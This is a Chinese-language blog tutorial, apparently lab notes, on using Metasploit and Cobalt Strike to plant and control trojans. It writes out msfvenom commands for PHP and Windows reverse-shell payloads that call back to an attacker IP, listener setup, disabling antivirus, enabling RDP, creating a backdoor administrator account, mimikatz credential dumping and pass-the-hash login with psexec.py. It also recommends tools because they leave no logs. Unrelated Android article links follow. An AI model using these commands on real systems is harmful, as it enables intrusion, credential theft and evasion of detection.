msf和Cobalt Strike工具的应用(远程控制木马的工具)
创始人
2024-09-26 05:47:24
0

一、msf

假设kali系统是创造木马的主机,Ubuntu系统是被种木马机,利用msf生成木马和远程控制木马

1、在kali系统上配置:

查看命令:msfvenom --help
payloads列表:msfvenom --list payloads

生成木马,命令:msfvenom -p   php/meterpreter/reverse_tcp LHOST=192.168.249.131 LPORT=12345 -o shellreverse.php
查看生成的木马文件,命令:cat shellreverse.php
搭建一个简单的web服务器,命令:python3 -m http.server 9999
关闭杀软防火墙下载shellreverse.php

2、在Ubuntu系统上

把html的权限降下来,命令:chown -R www-data:www-data html/

写一个web.php文件,让中国蚁剑能连接上

3、打开中国蚁剑

输入ubuntu系统IP地址/web.php

查看权限
下载好的shellreverse.php,用蚁剑上传到Ubuntu系统的html目录下

4、在kali系统上开始监听

命令:msfconsole
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.249.131
msf6 exploit(multi/handler) > set lport 12345
msf6 exploit(multi/handler) > exploit
访问请求shellreverse.php网页,php权限成功回弹到kali系统上

查看权限,命令:meterpreter > getuid

权限不够大,仅能控制对方网站

以上是msf中php的功能

5、分析下图:以ms17_010为例

exploit开头的是漏洞利用程序
auxiliary开头的是辅助程序,探测漏洞是否存在,是否能够利用
post是后渗透模块,比如我想远程登录一台服务器,但是他没有开放远程登录的端口,就可以用到post模块去远程登录,提权的操作

假设现在要入侵windows系统

6、命令:msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.249.131 LPORT=8888 -f exe > msfshell.exe

查看监听端口命令:netstat -tulnp | grep [PORT_NUMBER]

监听步骤同上:
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.249.131
msf6 exploit(multi/handler) > set lport 8888
msf6 exploit(multi/handler) > exploit

搭建web服务器:python3 -m http.server 9999,到windows系统网页打开关闭杀软防火墙,下载msfshell.exe,以管理员身份运行msfshell.exe

回弹成功如下图:

开放windows的3389端口,命令:meterpreter > run post/windows/manage/enable_rdp
查看端口命令:
netstat -ano
netstat -ano | findstr 3389

7、端口已经开放,有两种方式远程登录,创建一个新用户远程登录或直接用管理员账号登录

1、创建一个新用户登录,命令:C:\Users\11876\Desktop>net user oupeng openg123 /add

权限有点小,要提权,添加到管理员组去,命令:C:\Users\11876\Desktop>net localgroup administrators oupeng /add
用创建的用户远程登录连接windows系统
删除创建用户的命令:C:\Users\11876\Desktop>net user oupeng /del
2、用管理员账号登录

利用mimiKatz工具抓取明文密码,命令:meterpreter > load kiwi
meterpreter > hashdump
meterpreter > help(查看帮助)
meterpreter >getsystem
meterpreter >getuid
meterpreter > creds_all

如果用命令 creds_all没有抓到,那就按下面操作
查看进程,命令:meterpreter > ps
查看msfshell.exe进程,命令:meterpreter > ps -ef | grep msfshell.exe

为了让权限更高,迁移到system权限的进程,命令:meterpreter > migrate 10560

8、如果还是没有抓到,将mimikatz下载到入侵的windows操作系统上,然后再进行抓取,如下:

可以先在自己的操作系统下载好mimikatz,然后远程登录携带过去,这里我放在E盘
在携带过去的盘上找到mimikatz压缩包,复制到c盘随便一个目录下,然后解压,在x6
4目录下进入命令行

命令行输入:
mimikatz.exe
privilege::debug
sekurlsa::logonpasswords

如果出现下图的问题,说明mimikatz的版本不够低,可以下载低版本的来试试

上面依然没抓到管理员的明文密码,但是抓到了明文密码对应的哈希值,因为登录的时候是明文密码转换成哈希值然后和本地储存的哈希值进行比对,也就是登录框的winlogon程序接受到账号密码之后会发送给一个lsass的进程,这个进程会把明文密码留存在内存中,不仅如此,还会再把一份加密过的明文(哈希值)存储在C:\Windows\System32\config目录的SAM这个文件下,这个文件不可以打开、移动和删除,所以利用哈希值也是可以登录到设备的

9、那么,如何利用哈希值实现远程登录?

利用impacket工具
回到kali系统,输入命令查找这个工具,find / -name impacket
用这个命令查找应该会更好点:find / -name psexec.py

然后输入命令:cd /usr/share/doc/python3-impacket/examples

getST.py和getTGT.py的作用是获取黄金白银票据,goldenPac.py是黄金票据(与本次目的无关)
重点看psexec.py起到什么作用
命令:python3 psexec.py --help

可以得知,不需要明文密码,用哈希值就可以登录,用LM哈希和NT哈希,windows的密码在1994年之前用的是LM哈希,后来密码强度太弱,所以后来更新成了NT哈希,所以抓取到的LM哈希前头都一样,所以登录的时候LM哈希随便写,NT哈希要一致。
命令:python3 psexec.py administrator@192.168.249.132 -hashes 123:7b5e3b0dbe7fb43552facca9070bf4f5

成功登录了win10管理员的账户

如果其他服务器的明文密码和这个明文密码一样,那哈希值也一样,可以做到横向渗透,上面就是利用mimikatz抓取哈希值然后用psexec.py工具来实现的一个横向渗透,这个工具目标流量大,会记录日志,不太推荐
推荐smbexec.py和wmiexec.py,这两不记录日志

10、远程登录kali系统的教程(笔记)

1、sudo apt-get install xrdp

2、sudo apt-get install xfce4

3、sudo vi /etc/xrdp/startwm.sh

4、sudo service xrdp restart

5、sudo service xrdp status

二、CS工具的使用

有服务端和客户端之分,一般用于团队作战,有一个服务端的建立在公网上,一台云服务器,用来共享团队成员之间的shell

进服务端:

启动文件是teamserver,但是它依赖TeamServerImage,所以都要给执行权限
chmod -R 777 cs
chmod -R root:root cs
命令:./teamserver 192.168.249.131 oupeng123
查看端口有没有被占用命令:lsof -i:50050

进客户端:

命令./cobaltstrike-client.sh
改连接的ip为127.0.0.1,因为目前客户端和服务端都建立在一台设备上

不带less的是全功能

在win10上种马:

下载这个文件,然后以管理员身份打开

shell互相传递的功能

代理的功能

相关内容

热门资讯

安卓10系统更新关闭,全面优化... 你知道吗?最近安卓系统又来了一次大动作,那就是安卓10系统的更新关闭了!这可真是让人有点摸不着头脑,...
安卓系统的文件加密,Andro... 你知道吗?在咱们这个数字化时代,保护隐私和安全变得比以往任何时候都重要。尤其是对于安卓系统用户来说,...
使用安卓系统的费用,全面了解使... 你有没有想过,为什么有些人拿着安卓手机,而有些人却选择了苹果?这其中可不仅仅是品牌喜好那么简单,使用...
vivo用原生安卓系统下载,尽... 你有没有发现,现在手机市场真是热闹非凡,各种品牌争奇斗艳,让人眼花缭乱。不过,今天我要给你安利的,可...
安卓系统好用的桌面时钟,实用好... 你有没有发现,手机里的时钟功能有时候比闹钟还重要呢?想象每天早上被它温柔地叫醒,或者在忙碌的工作间隙...
安卓系统导航车载用优盘,安卓车... 你有没有想过,开车的时候,手机导航虽然方便,但有时候屏幕太小,看不清路线?别急,今天就来给你安利一个...
正确使用电池安卓系统,无忧体验 你知道吗?现在这个智能手机时代,电池续航能力可是大家关注的焦点。尤其是安卓系统用户,电池使用得当与否...
玩吧安卓可以和苹果系统,畅享游... 你知道吗?现在这个时代,手机可是我们生活中不可或缺的好伙伴。不管是安卓还是苹果,它们各有各的特色,各...
安卓系统怎么去掉hd,恢复纯净... 你是不是也和我一样,对安卓手机的系统设置充满了好奇?尤其是那个让人眼花缭乱的“HD”标识,有时候看着...
电脑安卓系统性能表,电脑版性能... 你有没有发现,现在手机电脑的操作系统越来越丰富,尤其是安卓系统,简直就像是个万能的小精灵,啥都能干。...
如何玩转机车安卓系统,玩转机车... 你有没有想过,拥有一台酷炫的机车安卓系统,让你的手机瞬间变身成为一辆会跑的摩托车?想象你可以在手机上...
安卓系统网页怎么回顶部,按钮才... 你是不是在使用安卓系统的手机或平板电脑浏览网页时,不小心翻到了页面底部,现在想回到顶部,却有点摸不着...
为什么安卓系统要认证,安卓系统... 你知道吗?安卓系统最近可是掀起了一阵认证热潮,这可不仅仅是简单的更新换代那么简单哦!为什么安卓系统要...
安卓50原生系统手机,功能革新... 你有没有发现,最近你的安卓手机突然变得不一样了?是不是因为它的系统升级到了安卓50原生系统呢?没错,...
安卓永远比不了的系统,永远无法... 你有没有想过,为什么安卓系统永远比不了某些其他系统呢?是不是每次看到那些流畅无阻、功能强大的设备,心...
安卓8怎么升级11系统,解锁新... 你有没有发现,你的安卓手机已经有点儿“老态龙钟”了?别急,别急,今天就来教你怎么给它来个青春焕发的大...
双系统安卓笔记本,开启移动办公... 你有没有想过,一台既能流畅运行安卓应用,又能轻松驾驭Windows系统的笔记本,会是怎样的体验呢?没...
安卓系统调降噪通透软件,打造清... 你有没有发现,最近你的安卓手机在听音乐或者打电话的时候,声音变得超级清晰,仿佛置身于现场?这可不是你...
安卓系统包后缀名,包后缀名背后... 你有没有发现,每次下载安卓应用时,文件名后面总会有那么几个神秘的字母组合,像是“apk”、“jar”...
安卓系统好用的工作软件,盘点十... 你有没有发现,自从你把手机里的安卓系统升级后,工作效率好像提高了不少呢?今天,就让我来给你细细道来,...